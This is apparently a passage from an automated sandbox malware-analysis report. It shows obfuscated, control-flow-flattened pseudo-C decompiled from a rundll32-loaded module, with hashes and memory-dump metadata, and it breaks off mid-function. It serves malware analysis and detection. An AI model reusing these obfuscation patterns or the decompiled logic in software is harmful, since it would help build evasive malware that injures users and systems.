                                                                                                                      							_t161 = E0069DCF7(_v556, 0x681000, __eflags);
                                                                                                                      							_t173 =  *0x6a3e10; // 0x0
                                                                                                                      							_t188 =  *0x6a3e10; // 0x0
                                                                                                                      							E006847CE(_t188 + 0x23c, _v528, _t173 + 0x1c, _v564, _v572, _t161, _t173 + 0x1c, _v588, _v544);
                                                                                                                      							_t158 = E0068A8B0(_v568, _t161, _v576);
                                                                                                                      							_t198 = _t198 + 0x24;
                                                                                                                      							_t164 = 0x2dc4ff7;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t164 != 0xafec1cc) {
                                                                                                                      							goto L8;
                                                                                                                      						}
                                                                                                                      						_t164 = 0x9efe9dd;
                                                                                                                      					}
                                                                                                                      					_t158 = E0068B6CF( &_v524, _v592, _v548, _v552);
                                                                                                                      					__eflags = 0;
                                                                                                                      					 *_t158 = 0;
                                                                                                                      					_t164 = 0x5cfc1e4;
                                                                                                                      					L8:
                                                                                                                      					__eflags = _t164 - 0xdc02af8;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t158;
                                                                                                                      			}

                                                                                                                      0x00686fee
                                                                                                                      0x00686fee
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Gx\$e2
                                                                                                                      • API String ID: 0-3912940318
                                                                                                                      • Opcode ID: 55d4e61b502759138caeb8476358718871d08e997929997031bc35652e89b19e
                                                                                                                      • Instruction ID: ca6ef48e5964392eab3277f3963f3dbdf572d04937d621519646e3a75204b0fc
                                                                                                                      • Opcode Fuzzy Hash: 55d4e61b502759138caeb8476358718871d08e997929997031bc35652e89b19e
                                                                                                                      • Instruction Fuzzy Hash: 597132711083419FC768DF25D88A81FBBF2FBC4758F205A1DF29696260D3B1994ACF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0068A55F() {
                                                                                                                      				char _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				intOrPtr _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _t161;
                                                                                                                      				char* _t162;
                                                                                                                      				intOrPtr _t164;
                                                                                                                      				void* _t168;
                                                                                                                      				signed int _t187;
                                                                                                                      				signed int _t189;
                                                                                                                      				signed int _t190;
                                                                                                                      				signed int _t191;
                                                                                                                      				signed int _t192;
                                                                                                                      				short* _t195;
                                                                                                                      				signed int* _t197;
                                                                                                                      
                                                                                                                      				_t197 =  &_v584;
                                                                                                                      				_v528 = _v528 & 0x00000000;
                                                                                                                      				_v524 = _v524 & 0x00000000;
                                                                                                                      				_t168 = 0xe71c2f1;
                                                                                                                      				_v532 = 0xa0346f;
                                                                                                                      				_v560 = 0x45ed96;
                                                                                                                      				_t187 = 0x29;
                                                                                                                      				_v560 = _v560 / _t187;
                                                                                                                      				_t189 = 0x5d;
                                                                                                                      				_v560 = _v560 * 0x5e;
                                                                                                                      				_v560 = _v560 ^ 0x00ac5e2c;
                                                                                                                      				_v568 = 0x587b3f;
                                                                                                                      				_v568 = _v568 >> 1;
                                                                                                                      				_v568 = _v568 >> 6;
                                                                                                                      				_v568 = _v568 + 0x3200;
                                                                                                                      				_v568 = _v568 ^ 0x000d20ef;
                                                                                                                      				_v540 = 0x1767bf;
                                                                                                                      				_v540 = _v540 >> 0xa;
                                                                                                                      				_v540 = _v540 ^ 0x00010300;
                                                                                                                      				_v548 = 0xad8e3d;
                                                                                                                      				_v548 = _v548 ^ 0x5762e507;
                                                                                                                      				_v548 = _v548 ^ 0xbd28358e;
                                                                                                                      				_v548 = _v548 ^ 0xeae8e106;
                                                                                                                      				_v584 = 0xa1a61c;
                                                                                                                      				_v584 = _v584 * 0x38;
                                                                                                                      				_v584 = _v584 + 0xffff1963;
                                                                                                                      				_v584 = _v584 | 0xaacebf86;
                                                                                                                      				_v584 = _v584 ^ 0xabd4b38c;
                                                                                                                      				_v556 = 0xa4c35b;
                                                                                                                      				_v556 = _v556 / _t189;
                                                                                                                      				_v556 = _v556 | 0xf6aeb391;
                                                                                                                      				_v556 = _v556 ^ 0xf6ac7ee7;
                                                                                                                      				_v536 = 0xf31b8a;
                                                                                                                      				_v536 = _v536 | 0x87603e20;
                                                                                                                      				_v536 = _v536 ^ 0x87f7aca9;
                                                                                                                      				_v576 = 0x423791;
                                                                                                                      				_v576 = _v576 + 0xffffb580;
                                                                                                                      				_v576 = _v576 + 0x7a73;
                                                                                                                      				_v576 = _v576 ^ 0x7a6e2c80;
                                                                                                                      				_v576 = _v576 ^ 0x7a24ad4c;
                                                                                                                      				_v544 = 0x7ccdad;
                                                                                                                      				_v544 = _v544 << 7;
                                                                                                                      				_v544 = _v544 ^ 0x3e66d3ae;
                                                                                                                      				_v572 = 0x1eeccc;
                                                                                                                      				_v572 = _v572 | 0x2c9b1d75;
                                                                                                                      				_v572 = _v572 << 6;
                                                                                                                      				_t190 = 0x5b;
                                                                                                                      				_v572 = _v572 / _t190;
                                                                                                                      				_v572 = _v572 ^ 0x007e2283;
                                                                                                                      				_v552 = 0x119b6d;
                                                                                                                      				_t191 = 0x5a;
                                                                                                                      				_v552 = _v552 / _t191;
                                                                                                                      				_v552 = _v552 ^ 0xceecc8a8;
                                                                                                                      				_v552 = _v552 ^ 0xceebe4d8;
                                                                                                                      				_v580 = 0x5ef79f;
                                                                                                                      				_v580 = _v580 / _t187;
                                                                                                                      				_v580 = _v580 | 0x8cf80c97;
                                                                                                                      				_t192 = 0x3d;
                                                                                                                      				_v580 = _v580 / _t192;
                                                                                                                      				_v580 = _v580 ^ 0x02499ffb;
                                                                                                                      				do {
                                                                                                                      					while(_t168 != 0xc65bb2) {
                                                                                                                      						if(_t168 == 0x63f282e) {
                                                                                                                      							_t162 = E0069DA22(_v560, _v568, __eflags, _v540,  &_v520, _t168, _v548);
                                                                                                                      							_t197 =  &(_t197[4]);
                                                                                                                      							_t168 = 0xc65bb2;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t168 == 0xb3c9692) {
                                                                                                                      							_t164 =  *0x6a3e10; // 0x0
                                                                                                                      							__eflags = _t164 + 0x1c;
                                                                                                                      							return E00683BC0(_v544, _v572, _t195, _v552, _v580, _t164 + 0x1c);
                                                                                                                      						}
                                                                                                                      						if(_t168 != 0xe71c2f1) {
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						_t168 = 0x63f282e;
                                                                                                                      					}
                                                                                                                      					_v564 = 0x8b8c25;
                                                                                                                      					_v564 = _v564 * 0x78;
                                                                                                                      					_v564 = _v564 + 0xffff9cfb;
                                                                                                                      					_v564 = _v564 ^ 0x41694e51;
                                                                                                                      					_t161 = E0068CB52(_v584,  &_v520, _v556, _v536, _v576);
                                                                                                                      					_t197 =  &(_t197[3]);
                                                                                                                      					_t195 =  &_v520 + _t161 * 2;
                                                                                                                      					while(1) {
                                                                                                                      						_t162 =  &_v520;
                                                                                                                      						__eflags = _t195 - _t162;
                                                                                                                      						if(_t195 <= _t162) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						__eflags =  *_t195 - 0x5c;
                                                                                                                      						if( *_t195 != 0x5c) {
                                                                                                                      							L10:
                                                                                                                      							_t195 = _t195 - 2;
                                                                                                                      							__eflags = _t195;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t139 =  &_v564;
                                                                                                                      						 *_t139 = _v564 - 1;
                                                                                                                      						__eflags =  *_t139;
                                                                                                                      						if( *_t139 == 0) {
                                                                                                                      							__eflags = _t195;
                                                                                                                      							L14:
                                                                                                                      							_t168 = 0xb3c9692;
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						goto L10;
                                                                                                                      					}
                                                                                                                      					goto L14;
                                                                                                                      					L15:
                                                                                                                      					__eflags = _t168 - 0x6143c47;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t162;
                                                                                                                      			}































                                                                                                                      0x0068a73c
                                                                                                                      0x0068a73c
                                                                                                                      0x0068a742
                                                                                                                      0x0068a772
                                                                                                                      0x0068a777
                                                                                                                      0x0068a77a
                                                                                                                      0x00000000
                                                                                                                      0x0068a77a
                                                                                                                      0x0068a746
                                                                                                                      0x0068a7f0
                                                                                                                      0x0068a7f5
                                                                                                                      0x00000000
                                                                                                                      0x0068a80f
                                                                                                                      0x0068a752
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068a758
                                                                                                                      0x0068a758
                                                                                                                      0x0068a77e
                                                                                                                      0x0068a78f
                                                                                                                      0x0068a793
                                                                                                                      0x0068a79b
                                                                                                                      0x0068a7b3
                                                                                                                      0x0068a7bc
                                                                                                                      0x0068a7bf
                                                                                                                      0x0068a7d3
                                                                                                                      0x0068a7d3
                                                                                                                      0x0068a7d7
                                                                                                                      0x0068a7d9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068a7c4
                                                                                                                      0x0068a7c8
                                                                                                                      0x0068a7d0
                                                                                                                      0x0068a7d0
                                                                                                                      0x0068a7d0
                                                                                                                      0x00000000
                                                                                                                      0x0068a7d0
                                                                                                                      0x0068a7ca
                                                                                                                      0x0068a7ca
                                                                                                                      0x0068a7ca
                                                                                                                      0x0068a7ce
                                                                                                                      0x0068a7dd
                                                                                                                      0x0068a7e0
                                                                                                                      0x0068a7e0
                                                                                                                      0x00000000
                                                                                                                      0x0068a7e0
                                                                                                                      0x00000000
                                                                                                                      0x0068a7ce
                                                                                                                      0x00000000
                                                                                                                      0x0068a7e2
                                                                                                                      0x0068a7e2
                                                                                                                      0x0068a7e2
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: QNiA$sz
                                                                                                                      • API String ID: 0-294658094
                                                                                                                      • Opcode ID: fb79a07f6a2ed0f7c649b011d5dcec1c066535297e9d8524351ddc23cf10ad2d
                                                                                                                      • Instruction ID: 3588af995ae3d048785028870eb94bf27132440a4d573647b77e717856d68ac4
                                                                                                                      • Opcode Fuzzy Hash: fb79a07f6a2ed0f7c649b011d5dcec1c066535297e9d8524351ddc23cf10ad2d
                                                                                                                      • Instruction Fuzzy Hash: 547164715093419BD398DF66D98581FBBF2FBC4718F404A1EF586A6260D3748A0A8F87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00690B19(void* __ecx) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				intOrPtr _v72;
                                                                                                                      				void* _t160;
                                                                                                                      				void* _t164;
                                                                                                                      				signed int _t166;
                                                                                                                      				signed int _t167;
                                                                                                                      				signed int _t168;
                                                                                                                      				signed int _t169;
                                                                                                                      				signed int _t170;
                                                                                                                      				intOrPtr _t190;
                                                                                                                      				intOrPtr* _t191;
                                                                                                                      				intOrPtr* _t192;
                                                                                                                      				signed int* _t194;
                                                                                                                      
                                                                                                                      				_t194 =  &_v68;
                                                                                                                      				_v12 = 0xec215;
                                                                                                                      				_v8 = 0x867af3;
                                                                                                                      				_t190 =  *0x6a3208; // 0x0
                                                                                                                      				_v4 = 0;
                                                                                                                      				_t164 = __ecx;
                                                                                                                      				_v64 = 0x2d9572;
                                                                                                                      				_t191 = _t190 + 0x20c;
                                                                                                                      				_v64 = _v64 + 0xffff7051;
                                                                                                                      				_v64 = _v64 ^ 0xb4c09ebb;
                                                                                                                      				_v64 = _v64 | 0x08f8e0e6;
                                                                                                                      				_v64 = _v64 ^ 0xbcfdfbfe;
                                                                                                                      				_v40 = 0xaf9231;
                                                                                                                      				_v40 = _v40 + 0x3789;
                                                                                                                      				_v40 = _v40 + 0x1acf;
                                                                                                                      				_v40 = _v40 ^ 0x00adbfc0;
                                                                                                                      				_v68 = 0xf5f340;
                                                                                                                      				_v68 = _v68 ^ 0x3b0075db;
                                                                                                                      				_v68 = _v68 >> 1;
                                                                                                                      				_v68 = _v68 + 0xaae2;
                                                                                                                      				_v68 = _v68 ^ 0x1dff90e5;
                                                                                                                      				_v24 = 0xe1803e;
                                                                                                                      				_v24 = _v24 + 0x946c;
                                                                                                                      				_v24 = _v24 ^ 0x00ebebe2;
                                                                                                                      				_v44 = 0xcb8087;
                                                                                                                      				_t166 = 0x7f;
                                                                                                                      				_v44 = _v44 / _t166;
                                                                                                                      				_v44 = _v44 << 5;
                                                                                                                      				_v44 = _v44 ^ 0x00394faa;
                                                                                                                      				_v32 = 0x6e7c9c;
                                                                                                                      				_v32 = _v32 << 0xf;
                                                                                                                      				_v32 = _v32 >> 6;
                                                                                                                      				_v32 = _v32 ^ 0x00f599ec;
                                                                                                                      				_v36 = 0x8d7ece;
                                                                                                                      				_v36 = _v36 + 0xd96f;
                                                                                                                      				_v36 = _v36 + 0x3e8b;
                                                                                                                      				_v36 = _v36 ^ 0x008d6b01;
                                                                                                                      				_v60 = 0x740a18;
                                                                                                                      				_v60 = _v60 + 0x5af6;
                                                                                                                      				_t167 = 0x2d;
                                                                                                                      				_v60 = _v60 / _t167;
                                                                                                                      				_t168 = 0xc;
                                                                                                                      				_v60 = _v60 / _t168;
                                                                                                                      				_v60 = _v60 ^ 0x000f4a79;
                                                                                                                      				_v48 = 0xecd979;
                                                                                                                      				_v48 = _v48 + 0xffff2496;
                                                                                                                      				_t169 = 3;
                                                                                                                      				_v48 = _v48 / _t169;
                                                                                                                      				_v48 = _v48 ^ 0xbc9c03a4;
                                                                                                                      				_v48 = _v48 ^ 0xbcdb2390;
                                                                                                                      				_v52 = 0x17ff93;
                                                                                                                      				_v52 = _v52 << 0xd;
                                                                                                                      				_v52 = _v52 + 0x3109;
                                                                                                                      				_v52 = _v52 ^ 0x7590f195;
                                                                                                                      				_v52 = _v52 ^ 0x8a641707;
                                                                                                                      				_v20 = 0x28811b;
                                                                                                                      				_v20 = _v20 * 0x25;
                                                                                                                      				_v20 = _v20 ^ 0x05ddec85;
                                                                                                                      				_v56 = 0x23ad29;
                                                                                                                      				_t170 = 0x5a;
                                                                                                                      				_v56 = _v56 / _t170;
                                                                                                                      				_v56 = _v56 >> 8;
                                                                                                                      				_v56 = _v56 ^ 0x06fabbcf;
                                                                                                                      				_v56 = _v56 ^ 0x06fdb2ad;
                                                                                                                      				_v28 = 0x8d9789;
                                                                                                                      				_v28 = _v28 | 0x3813f7c3;
                                                                                                                      				_v28 = _v28 + 0xa24c;
                                                                                                                      				_v28 = _v28 ^ 0x38ab2d0e;
                                                                                                                      				_v16 = 0x83a12;
                                                                                                                      				_v16 = _v16 << 0xb;
                                                                                                                      				_v16 = _v16 ^ 0x41de3db0;
                                                                                                                      				while(1) {
                                                                                                                      					_t192 =  *_t191;
                                                                                                                      					if(_t192 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					if( *((intOrPtr*)(_t192 + 0x38)) == 0) {
                                                                                                                      						L4:
                                                                                                                      						 *_t191 =  *_t192;
                                                                                                                      						_t160 = E00698519(_v28, _v16, _t192);
                                                                                                                      					} else {
                                                                                                                      						_t133 =  &_v40; // 0xebebe2
                                                                                                                      						_t160 = E00688DC4( *_t133, _v68, _v24, _v44,  *((intOrPtr*)(_t192 + 0x2c)), _t164);
                                                                                                                      						_t194 =  &(_t194[4]);
                                                                                                                      						if(_t160 != _v64) {
                                                                                                                      							_t191 = _t192;
                                                                                                                      						} else {
                                                                                                                      							 *((intOrPtr*)(_t192 + 0x1c))( *((intOrPtr*)(_t192 + 0x38)), 0, 0);
                                                                                                                      							E00699E56(_v44, _v48, _v72,  *((intOrPtr*)(_t192 + 0x38)));
                                                                                                                      							E00691E67(_v60, _v64, _v32, _v68,  *((intOrPtr*)(_t192 + 0x2c)));
                                                                                                                      							_t194 =  &(_t194[5]);
                                                                                                                      							goto L4;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				return _t160;
                                                                                                                      			}

































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1$
                                                                                                                      • API String ID: 0-209397207
                                                                                                                      • Opcode ID: 3b184e5783c89970d49c7a8312e027a105486dc4a9e9758e1d4787fefea569e7
                                                                                                                      • Instruction ID: 9579ccb1e7cb8ba0ddc191f2ec0fcd6fc1294dd128590f9c31e8aa1aa77c54d3
                                                                                                                      • Opcode Fuzzy Hash: 3b184e5783c89970d49c7a8312e027a105486dc4a9e9758e1d4787fefea569e7
                                                                                                                      • Instruction Fuzzy Hash: 9C614FB25083419FD394CF21D48940BBBF2FFC9768F509A1DF19692260C7B1DA4A8F46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E0068AEFB(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                                                                      				char _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				void* _t116;
                                                                                                                      				void* _t130;
                                                                                                                      				intOrPtr _t133;
                                                                                                                      				void* _t137;
                                                                                                                      				intOrPtr* _t154;
                                                                                                                      				void* _t155;
                                                                                                                      				signed int _t156;
                                                                                                                      				signed int _t157;
                                                                                                                      				signed int _t158;
                                                                                                                      				signed int _t159;
                                                                                                                      				void* _t161;
                                                                                                                      				void* _t162;
                                                                                                                      
                                                                                                                      				_t135 = _a12;
                                                                                                                      				_push(_a16);
                                                                                                                      				_t154 = __ecx;
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t116);
                                                                                                                      				_v44 = 0xe8605f;
                                                                                                                      				_t162 = _t161 + 0x18;
                                                                                                                      				_v44 = _v44 + 0x84a0;
                                                                                                                      				_v44 = _v44 ^ 0x00e8e4ff;
                                                                                                                      				_t155 = 0;
                                                                                                                      				_v68 = 0xe00e28;
                                                                                                                      				_t137 = 0xc99b7e9;
                                                                                                                      				_v68 = _v68 << 9;
                                                                                                                      				_v68 = _v68 << 2;
                                                                                                                      				_t156 = 0x3b;
                                                                                                                      				_v68 = _v68 / _t156;
                                                                                                                      				_v68 = _v68 ^ 0x0001eb63;
                                                                                                                      				_v76 = 0x5a4023;
                                                                                                                      				_v76 = _v76 >> 0xf;
                                                                                                                      				_t157 = 0x5b;
                                                                                                                      				_v76 = _v76 * 0x13;
                                                                                                                      				_v76 = _v76 ^ 0x64c481b8;
                                                                                                                      				_v76 = _v76 ^ 0x64ccd277;
                                                                                                                      				_v64 = 0xe36df4;
                                                                                                                      				_v64 = _v64 / _t157;
                                                                                                                      				_t158 = 9;
                                                                                                                      				_v64 = _v64 * 0x52;
                                                                                                                      				_v64 = _v64 ^ 0x00c8b522;
                                                                                                                      				_v80 = 0x952e3b;
                                                                                                                      				_v80 = _v80 >> 6;
                                                                                                                      				_v80 = _v80 ^ 0xc023484e;
                                                                                                                      				_v80 = _v80 / _t158;
                                                                                                                      				_v80 = _v80 ^ 0x155df6ec;
                                                                                                                      				_v72 = 0x4bfcfc;
                                                                                                                      				_v72 = _v72 | 0x0a339af0;
                                                                                                                      				_v72 = _v72 << 0xf;
                                                                                                                      				_t159 = 0x12;
                                                                                                                      				_v72 = _v72 / _t159;
                                                                                                                      				_v72 = _v72 ^ 0x0e3e5ce5;
                                                                                                                      				_v40 = 0xc0630c;
                                                                                                                      				_v40 = _v40 | 0x5d0d844d;
                                                                                                                      				_v40 = _v40 ^ 0x5dc4e99c;
                                                                                                                      				_v52 = 0x98b7b;
                                                                                                                      				_v52 = _v52 + 0xa105;
                                                                                                                      				_v52 = _v52 >> 5;
                                                                                                                      				_v52 = _v52 ^ 0x0004c78d;
                                                                                                                      				_v56 = 0xd0814a;
                                                                                                                      				_v56 = _v56 >> 9;
                                                                                                                      				_v56 = _v56 * 0x3e;
                                                                                                                      				_v56 = _v56 ^ 0x001a31dc;
                                                                                                                      				_v60 = 0xb9e1cb;
                                                                                                                      				_v60 = _v60 * 0x25;
                                                                                                                      				_v60 = _v60 << 0xa;
                                                                                                                      				_v60 = _v60 ^ 0x768204a8;
                                                                                                                      				_v48 = 0xccd34a;
                                                                                                                      				_v48 = _v48 + 0xffff20ce;
                                                                                                                      				_v48 = _v48 ^ 0x00ce4dff;
                                                                                                                      				do {
                                                                                                                      					while(_t137 != 0x8f26e2d) {
                                                                                                                      						if(_t137 == 0xc99b7e9) {
                                                                                                                      							_t137 = 0x8f26e2d;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t137 != 0xfe1ef29) {
                                                                                                                      								goto L10;
                                                                                                                      							} else {
                                                                                                                      								_t133 =  *0x6a3dfc; // 0x0
                                                                                                                      								E0069E274(_v72, _v40, _t137,  *_t135,  *((intOrPtr*)(_t135 + 4)), _v44, _v52, _v56, _v60, _t137,  *((intOrPtr*)(_t133 + 0x40)), _v48,  &_v36);
                                                                                                                      								_t155 =  ==  ? 1 : _t155;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L5:
                                                                                                                      						return _t155;
                                                                                                                      					}
                                                                                                                      					_push( *_t154);
                                                                                                                      					_t130 = E0069AE6D(_v76,  &_v36,  *((intOrPtr*)(_t154 + 4)), _v64, _t137, _v80);
                                                                                                                      					_t162 = _t162 + 0x14;
                                                                                                                      					if(_t130 == 0) {
                                                                                                                      						_t137 = 0xeaa5f76;
                                                                                                                      						goto L10;
                                                                                                                      					} else {
                                                                                                                      						_t137 = 0xfe1ef29;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L5;
                                                                                                                      					L10:
                                                                                                                      				} while (_t137 != 0xeaa5f76);
                                                                                                                      				goto L5;
                                                                                                                      			}


                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #@Z$_`
                                                                                                                      • API String ID: 0-2586238014
                                                                                                                      • Opcode ID: 28c71c5782de270dd2ec65bd86ba75c292342aa07133ee94ef5c853220346791
                                                                                                                      • Instruction ID: 75575286d9df1ee71a16678daca4dafc9fcf362ca2513a83695acadc0a47cac4
                                                                                                                      • Opcode Fuzzy Hash: 28c71c5782de270dd2ec65bd86ba75c292342aa07133ee94ef5c853220346791
                                                                                                                      • Instruction Fuzzy Hash: A95125711083009FC758DF22C88A81FBBE6FBD8758F549A1DF59696260C372DA49CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0068DFF3() {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				intOrPtr _t128;
                                                                                                                      				intOrPtr _t131;
                                                                                                                      				signed int _t133;
                                                                                                                      				signed int _t134;
                                                                                                                      				intOrPtr _t135;
                                                                                                                      				void* _t143;
                                                                                                                      				void* _t146;
                                                                                                                      				signed int* _t148;
                                                                                                                      
                                                                                                                      				_t148 =  &_v52;
                                                                                                                      				_v12 = 0xa1a716;
                                                                                                                      				_v12 = _v12 + 0x2188;
                                                                                                                      				_v12 = _v12 ^ 0x00a02056;
                                                                                                                      				_v32 = 0x472a3;
                                                                                                                      				_v32 = _v32 + 0x22e5;
                                                                                                                      				_v32 = _v32 ^ 0xff9fab52;
                                                                                                                      				_v32 = _v32 ^ 0xff9c5b0a;
                                                                                                                      				_v48 = 0x9a7516;
                                                                                                                      				_v48 = _v48 + 0xffff4702;
                                                                                                                      				_v48 = _v48 * 0x45;
                                                                                                                      				_v48 = _v48 + 0xffff2ff5;
                                                                                                                      				_t146 = 0x4903f33;
                                                                                                                      				_v48 = _v48 ^ 0x296ff1ed;
                                                                                                                      				_v16 = 0xfa3b71;
                                                                                                                      				_v16 = _v16 << 9;
                                                                                                                      				_v16 = _v16 ^ 0xf47f6bba;
                                                                                                                      				_v20 = 0xc0b9b;
                                                                                                                      				_t133 = 0x7b;
                                                                                                                      				_v20 = _v20 * 0x52;
                                                                                                                      				_v20 = _v20 ^ 0x03d2ca7d;
                                                                                                                      				_v36 = 0x400b3e;
                                                                                                                      				_v36 = _v36 ^ 0xba288636;
                                                                                                                      				_v36 = _v36 ^ 0xc4c376ba;
                                                                                                                      				_v36 = _v36 ^ 0x7eaacb92;
                                                                                                                      				_v52 = 0x3419b2;
                                                                                                                      				_v52 = _v52 / _t133;
                                                                                                                      				_v52 = _v52 >> 0xc;
                                                                                                                      				_v52 = _v52 | 0xcef26f8a;
                                                                                                                      				_v52 = _v52 ^ 0xcef1d6cf;
                                                                                                                      				_v4 = 0xb26f64;
                                                                                                                      				_t134 = 3;
                                                                                                                      				_v4 = _v4 / _t134;
                                                                                                                      				_v4 = _v4 ^ 0x003ff5cc;
                                                                                                                      				_v40 = 0x34a33d;
                                                                                                                      				_v40 = _v40 >> 4;
                                                                                                                      				_v40 = _v40 ^ 0xd21b54bd;
                                                                                                                      				_v40 = _v40 ^ 0x33ae4ce0;
                                                                                                                      				_v40 = _v40 ^ 0xe1b00bb7;
                                                                                                                      				_v8 = 0x4c76b4;
                                                                                                                      				_v8 = _v8 << 2;
                                                                                                                      				_v8 = _v8 ^ 0x013e4034;
                                                                                                                      				_v24 = 0x1c9e42;
                                                                                                                      				_v24 = _v24 ^ 0x4f10b4b5;
                                                                                                                      				_v24 = _v24 << 4;
                                                                                                                      				_v24 = _v24 ^ 0xf0cd9088;
                                                                                                                      				_v44 = 0xfe69b1;
                                                                                                                      				_v44 = _v44 >> 0xd;
                                                                                                                      				_v44 = _v44 * 0x49;
                                                                                                                      				_v44 = _v44 * 0x7d;
                                                                                                                      				_v44 = _v44 ^ 0x011db47c;
                                                                                                                      				_v28 = 0x46ec28;
                                                                                                                      				_v28 = _v28 << 9;
                                                                                                                      				_v28 = _v28 * 0x58;
